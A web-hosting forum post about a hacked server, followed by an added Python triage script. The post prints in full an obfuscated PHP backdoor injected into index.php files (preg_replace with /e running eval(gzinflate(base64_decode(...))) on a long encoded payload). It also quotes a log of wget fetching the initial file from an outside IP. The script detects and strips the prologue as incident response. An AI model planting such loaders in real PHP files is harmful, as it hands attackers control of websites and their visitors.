Hi all,
Last night we faced a hack on one of our servers. Someone from Russia was able to upload a file to a domain on the server, and after that all index.php files of all domains of that user were edited: at the top there was extra code that corrupted the index pages:
aka
PHP:
<?php ob_start(); ?>
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZfNjtxGDITvAfIOC2MPycWQ1H8SjLzJXjQ7mjhAnAABYozf3s3ix5FWCTbIoTEjdTebZBWLref7fC3z16enj788fXi5t6GP6eVeSx/t5V5u+7PN1dc+xj6Sv5vmPvr81NdNWx+r/9ecvX/139J/W1+bah/l8Nz83Zv58e1zTofnbivNp/Xtrb182p+Wk71ymq/vnHf2x/zN78Tzb/6d4z/bO593tJdO/qXT+X1tPufvPf/qP8/7X/uJb+p+t451sf19Lvf/dYU/2TGQXXu2/Pc9zewYVsaf2fNse8rqNsria21d3fy95mf2TP7bmq+1Ydjm/j4vjmvN7FnggtlLb7lg3MwzfnFmKX6OvZcvxvWbx1cmMOijVo+hXjxWnX/xGrG9eubX8ma2s9XQSN4u8DNha/Z8Wz4a2Ng61dnNbVhMjTwrhnmPMdf9zGx2iEccnP05h831w6cff3i+/3FPv/36KPjsAdYrSW0U1OSO5asfbMm3RJsz+WDUgnsUmTkFAGbPAqwEkADbAmkAKfLNALLh8Eagg5+vtZDIfLF5CczFiZDXQ+JG32dgKy7IaMksJNFik3htvBvwCdDk9+rn2lysecQye46Uk+R+h48V4VPOyKXEMvt+WxviKR8b50MWO9v8N9uNZxUXZG4Q12I3LESqEZ8DFwpGcxO4jZBtJK4MKQf2bY69yJkh0oXcjcS2eQHI5/EQs/lEoYkzyRuH2TYfjeiZAjfBeOCa3D/5W9w3O19ikPE9uR+GhxHd4ldebu6H5uCPcn/1X7MjvF69AMSD1WMR/tddTFVc0YRW8jy6zXIosnjWWSNjoUkiDI08iyOBa4bX5Eucz4jDQH4T4kOOJgRjorbsTOOm8VT1VeAo2JkAVWrBhgRedeAF//nPv9K3R8HPHDg5qDYE1kxiM++KJ1BEn/3gKPoJ9ROhA5y6A5BQKxXe5ACLgGnfoyIYUNiRQm4oWQKMAmGaBySbJDwFEJsnTd1lghSjEyw6hpGpQcLEzUVdo7mPKbrVQreuJHOhC8ycifqKpFfP1eMGU/eiUA4zxXxFWG4UxEIcG6DdUGnIbXsKgFu+EkVdp4NYYl+YFJ/T/CtEKviSiWWkSC/sa3Sg1W0WhM98LQiYRK5BtOR4JUgmniwIIFg01sWeuh5ipqFE16vBoUrHGhCpmY4dQsUeFeLAbYcYtecGRokcbvAibiTkqnGraYiv+dLIq2JCXCo8UHyRl2g2MU+DiybZAodXeDsexP/gjwQL/AvNSoXdqI/NbWs/IhZ2hWHjJoMfLepqhPMSbS/48vnv8uVR8IVEzRChEDhdN8eVqqFwM8YBRyTmfYFsKp4N8jWAXj0BRrLEWiU3sya69QCYmX0FRVs8KZZ4s6GC4kqTuRnoU6ThU/FzUtu7Y+VGUbDX6JbxuaKYUGl1hCBx4nYRPhCTusuVmxCARjfOQfgZxebzSCKHMsu/YS+ECg7CpDghJSYUQ0Kc4xouQqDqmY4ssaFj2m+L3ND1be0U3Ttjj98KiaIYCp8f4kYIdHziYVu5xWd17Ir4NW4OIx1upXAX8nTZu6oKCVsqzsbNiqJv/H/cLhA+3RgC/3G/1T26bTST20FIL+CBKAXPdWUe/V0ZomCIhdvG4/OP63g+fHoIx9XXqDM3xM0azNXHdPwUnV7efnr+13Nye8fPZg3jWy/s7ev6+0/PfK5/fIp7vP3zBm//VPk/f/oO'\x29\x29\x29\x3B","");
?>
In the Apache error log I have found this; that was the initial file that got uploaded:
--2014-04-24 05:59:00-- http://50.7.193.123//index.123.txt
Connecting to 50.7.193.123:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 218314 (213K) [text/plain]
Saving to: "index.htm.php"
0K .......... .......... .......... .......... .......... 23% 54.5K 3s
50K .......... .......... .......... .......... .......... 46% 155K 1s
100K .......... .......... .......... .......... .......... 70% 79.6K 1s
150K .......... .......... .......... .......... .......... 93% 32.0K 0s
200K .......... ... 100% 23.2K=4.0s
2014-04-24 05:59:05 (53.3 KB/s) - "index.htm.php" saved [218314/218314]
host: no process killed
job 1 at 2014-04-24 05:59
It looks to me like wget was used to download the file. Am I correct on this, or how did they do it? Maybe a bug in Apache?
Any help will be appreciated. I really need to know how they did it, to increase security and avoid this in the future.
Kind regards
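The prologue shown above uses the PHP `preg_replace` `/e` modifier, which evaluates the replacement string as PHP code; the replacement is hex-escaped so that a casual look does not reveal what it calls. The following is an added example (not the poster's code and not part of the thread) that triages such files without executing anything: it decodes the `\x..` escapes to show the call the prologue makes, flags any `preg_replace` whose pattern carries `e`, walks a document root for affected `index.php` files, and strips a confirmed injected prologue. The sample input is constructed and modelled on the post, with the long base64 body replaced by the placeholder `PAYLOAD_PLACEHOLDER`; the function names are the example's own.

```python
"""Text-only triage of the preg_replace(/e) index.php injection from the post.

Added example, not the poster's code. Reads PHP as text and never runs it.
"""
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Constructed sample: the injected prologue as shown in the post (base64 body
# replaced by a placeholder), followed by what the site's own index.php held.
SAMPLE_INJECTED = (
    "<?php ob_start(); ?>\n"
    "<?php\n"
    'preg_replace("/.*/e","'
    "\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28"
    "\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28"
    "'PAYLOAD_PLACEHOLDER'\\x29\\x29\\x29\\x3B\",\"\");\n"
    "?>\n"
    "<?php\n"
    'echo "legitimate site index";\n'
)

# First two string arguments of a preg_replace() call (pattern, replacement).
PREG_RE = re.compile(
    r"preg_replace\s*\(\s*([\"'])(?P<pattern>.*?)\1\s*,\s*([\"'])(?P<repl>.*?)\3",
    re.DOTALL,
)
# PHP double-quoted "\xHH" escapes (one or two hex digits).
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
# The exact two-block prologue from the post: ob_start(), then the preg_replace.
PROLOGUE_RE = re.compile(
    r"\A\s*<\?php\s+ob_start\(\);\s*\?>\s*<\?php\s+preg_replace\s*\(.*?\);\s*\?>\s*",
    re.DOTALL,
)


def pcre_modifiers(pattern: str) -> str:
    """Return the modifier letters after the closing delimiter of a PCRE pattern."""
    if not pattern:
        return ""
    delim = pattern[0]
    closing = {"(": ")", "{": "}", "[": "]", "<": ">"}.get(delim, delim)
    end = pattern.rfind(closing)
    return pattern[end + 1:] if end > 0 else ""


def decode_php_hex_escapes(text: str) -> str:
    """Turn \\x65\\x76... into readable characters so the call can be read."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_source(source: str) -> List[Dict[str, str]]:
    """Flag preg_replace calls that evaluate code or hide an eval-style call."""
    findings = []
    for m in PREG_RE.finditer(source):
        pattern, repl = m.group("pattern"), m.group("repl")
        mods = pcre_modifiers(pattern)
        head = decode_php_hex_escapes(repl).lstrip()[:40]
        reasons = []
        if "e" in mods:
            reasons.append("/e modifier: replacement is evaluated as PHP code")
        if HEX_ESCAPE.search(repl):
            reasons.append("replacement is hex-escaped to hide its contents")
        if re.match(r"(eval|assert|gzinflate|base64_decode|str_rot13)\s*\(", head):
            reasons.append("decoded replacement calls " + head.split("(")[0].strip())
        if reasons:
            findings.append({"pattern": pattern, "modifiers": mods,
                             "decoded_prefix": head, "reasons": "; ".join(reasons)})
    return findings


def scan_tree(root: str, filename: str = "index.php") -> Dict[str, List[Dict[str, str]]]:
    """Walk a document root and report every index.php with a finding."""
    hits: Dict[str, List[Dict[str, str]]] = {}
    for path in Path(root).rglob(filename):
        try:
            findings = scan_source(path.read_text(errors="replace"))
        except OSError:
            continue
        if findings:
            hits[str(path)] = findings
    return hits


def strip_injected_prologue(source: str) -> Tuple[str, bool]:
    """Remove the prologue only when it is the flagged preg_replace block."""
    m = PROLOGUE_RE.match(source)
    if not m or not scan_source(m.group(0)):
        return source, False  # untouched: no prologue, or a benign ob_start()
    return source[m.end():], True


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python3 triage.py /home/user/public_html
        for path, findings in scan_tree(sys.argv[1]).items():
            for f in findings:
                print(f"{path}: {f['reasons']} ({f['decoded_prefix']}...)")
    else:
        for f in scan_source(SAMPLE_INJECTED):
            print(f["reasons"], "->", f["decoded_prefix"])
        cleaned, removed = strip_injected_prologue(SAMPLE_INJECTED)
        print("prologue removed:", removed)
```

Decoding the escapes shows the prologue calls `eval(gzinflate(base64_decode(...)))`, i.e. the real payload is only visible after inflating the base64 body, which is why a plain text search for `eval` misses it. The stripper is deliberately narrow (it requires the flagged `preg_replace` inside the matched block) so that a legitimate `ob_start()` at the top of a file is left alone; restoring the files from a known-good backup is still the safer fix, and the scan is only useful as a check that no copy of the prologue survives.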